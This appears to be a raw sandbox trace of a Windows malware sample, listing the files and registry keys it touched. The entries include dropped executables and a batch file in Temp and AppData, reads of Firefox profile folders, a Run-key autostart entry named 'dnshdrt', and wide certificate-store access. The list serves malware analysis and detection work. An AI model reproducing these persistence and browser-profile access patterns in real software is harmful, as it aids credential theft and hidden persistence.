C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\*
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\321.txt
C:\Windows\sysnative\C_1252.NLS
C:\Users\user\AppData\Local\Temp\KmHJvidHgRX.exe
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
C:\Users\user\AppData\Local\Temp\F9FA\7CDD.tmp
C:\Users\user\AppData\Local\Temp\F9FA\7CDD.bat
C:\Users\user\AppData\Local\Temp\Cab6E6C.tmp
C:\Users\user\AppData\Local\Temp\Tar6E6D.tmp
C:\Users\user\AppData\Local\Temp\Cab6F0A.tmp
C:\Users\user\AppData\Local\Temp\Tar6F0B.tmp
C:\Windows\sysnative\en-US\WINHTTP.dll.mui
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\Local\Temp\Cab78DB.tmp
C:\Users\user\AppData\Local\Temp\Tar78DC.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\user\AppData\Local\Temp\Cab859A.tmp
C:\Users\user\AppData\Local\Temp\Tar859B.tmp
C:\Users\user\AppData\Local\Temp\Cab87BE.tmp
C:\Users\user\AppData\Local\Temp\Tar87BF.tmp
C:\Windows\sysnative\ntdll.dll
C:\Users\user\AppData\Roaming\system64.dll
C:\Users\user\AppData\Local\Temp\Cab9E9F.tmp
C:\Users\user\AppData\Local\Temp\Tar9EA0.tmp
C:\Users\user\AppData\Local\Temp\CabA4B9.tmp
C:\Users\user\AppData\Local\Temp\TarA4BA.tmp
C:\Users\user\AppData\Local\Temp\CabA509.tmp
C:\Users\user\AppData\Local\Temp\TarA50A.tmp
C:\Users\user\AppData\Local\Temp\CabA77B.tmp
C:\Users\user\AppData\Local\Temp\TarA77C.tmp
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
C:\Users\user\AppData\Local\Temp\F9FA\7CDD.bat
C:\Users\user\AppData\Local\Temp\Cab6E6C.tmp
C:\Users\user\AppData\Local\Temp\Tar6E6D.tmp
C:\Users\user\AppData\Local\Temp\Cab6F0A.tmp
C:\Users\user\AppData\Local\Temp\Tar6F0B.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\Local\Temp\Cab78DB.tmp
C:\Users\user\AppData\Local\Temp\Tar78DC.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\user\AppData\Local\Temp\Cab859A.tmp
C:\Users\user\AppData\Local\Temp\Tar859B.tmp
C:\Users\user\AppData\Local\Temp\Cab87BE.tmp
C:\Users\user\AppData\Local\Temp\Tar87BF.tmp
C:\Users\user\AppData\Local\Temp\Cab9E9F.tmp
C:\Users\user\AppData\Local\Temp\Tar9EA0.tmp
C:\Users\user\AppData\Local\Temp\CabA4B9.tmp
C:\Users\user\AppData\Local\Temp\TarA4BA.tmp
C:\Users\user\AppData\Local\Temp\CabA509.tmp
C:\Users\user\AppData\Local\Temp\TarA50A.tmp
C:\Users\user\AppData\Local\Temp\CabA77B.tmp
C:\Users\user\AppData\Local\Temp\TarA77C.tmp
C:\Users\user\AppData\Local\Temp\F9FA\7CDD.bat
C:\Users\user\AppData\Local\Temp\KmHJvidHgRX.exe
C:\Users\user\AppData\Local\Temp\Cab6E6C.tmp
C:\Users\user\AppData\Local\Temp\Tar6E6D.tmp
C:\Users\user\AppData\Local\Temp\Cab6F0A.tmp
C:\Users\user\AppData\Local\Temp\Tar6F0B.tmp
C:\Users\user\AppData\Local\Temp\Cab78DB.tmp
C:\Users\user\AppData\Local\Temp\Tar78DC.tmp
C:\Users\user\AppData\Local\Temp\Cab859A.tmp
C:\Users\user\AppData\Local\Temp\Tar859B.tmp
C:\Users\user\AppData\Local\Temp\Cab87BE.tmp
C:\Users\user\AppData\Local\Temp\Tar87BF.tmp
C:\Users\user\AppData\Local\Temp\Cab9E9F.tmp
C:\Users\user\AppData\Local\Temp\Tar9EA0.tmp
C:\Users\user\AppData\Local\Temp\CabA4B9.tmp
C:\Users\user\AppData\Local\Temp\TarA4BA.tmp
C:\Users\user\AppData\Local\Temp\CabA509.tmp
C:\Users\user\AppData\Local\Temp\TarA50A.tmp
C:\Users\user\AppData\Local\Temp\CabA77B.tmp
C:\Users\user\AppData\Local\Temp\TarA77C.tmp
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\crypt32
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DebugHeapFlags
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LDAP
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\LdapClientIntegrity
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\UseOldHostResolutionOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\UseHostnameAsAlias
DisableUserModeCallbackFilter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dnshdrt
HKEY_USERS\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Client
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\KmHJvidHgRX.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000809
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Option
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Ini
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Temp
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextLockCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextListCount
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.44.3.4!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.44.3.4!7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.44.3.4!7\Name
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MUI\StringCacheSettings
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings\StringCacheGeneration
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\LanguageList
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\system32\p2pcollab.dll,-8042
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.47.1.1!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.47.1.1!7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.47.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\system32\qagentrt.dll,-10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.64.1.1!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.64.1.1!7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.64.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.1!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.1!7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.2!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.2!7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.2!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagMatchAnyMask
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\Root\ProtectedRoots
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\ChainEngine\Config
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableMandatoryBasicConstraints
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableCANameConstraints
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableUnsupportedCriticalExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlCountInCert
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalCountPerChain
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxUrlRetrievalByteCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalByteCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalCertCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\CryptnetPreFetchTriggerPeriodSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\EnableWeakSignatureFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\ChainCacheResyncFiletime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv\#16
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv\Ldap
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CertDllOpenStoreProv
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\Keys
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\CTLs
HKEY_CURRENT_USER\
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA\Certificates
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA\CRLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\CA\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\CA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\109F1CAED645BB78B3EA2B94C0697C740733031C
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\109F1CAED645BB78B3EA2B94C0697C740733031C\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\D559A586669B08F46A30A133F8A9ED3D038E2EA8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\D559A586669B08F46A30A133F8A9ED3D038E2EA8\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\FEE449EE0E3965A5246F000E87FDE2A065FD89D4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\FEE449EE0E3965A5246F000E87FDE2A065FD89D4\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs\A377D1B1C0538833035211F4083D00FECC414DAB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs\A377D1B1C0538833035211F4083D00FECC414DAB\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\CA
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\CA\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\CA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\CA\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\CA\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\CA\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\CA\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\Safer
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\Safer
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\TrustedPublisher\Safer
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed\CTLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\Disallowed
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\Disallowed\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\Disallowed
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\637162CC59A3A1E25956FA5FA8F60D2E1C52EAC6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\637162CC59A3A1E25956FA5FA8F60D2E1C52EAC6\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\7D7F4414CCEF168ADF6BF40753B5BECD78375931
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\7D7F4414CCEF168ADF6BF40753B5BECD78375931\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\Disallowed
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\Disallowed\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\Disallowed
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\ProtectedRoots
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\ProtectedRoots\Certificates
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\Root\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\Root
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\245C97DF7514E7CF2DF8BE72AE957B9E04741E85
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\245C97DF7514E7CF2DF8BE72AE957B9E04741E85\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7F88CD7223F3C813818C994614A89C99FA3B5247
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7F88CD7223F3C813818C994614A89C99FA3B5247\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\A43489159A520F0D93D032CCAF37E7FE20A8B419
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\A43489159A520F0D93D032CCAF37E7FE20A8B419\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BE36A4562FB2EE05DBB3D32323ADF445084ED656
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BE36A4562FB2EE05DBB3D32323ADF445084ED656\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CDD4EEAE6000AC7F40C3802C171E30148030C072
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CDD4EEAE6000AC7F40C3802C171E30148030C072\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\AuthRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob
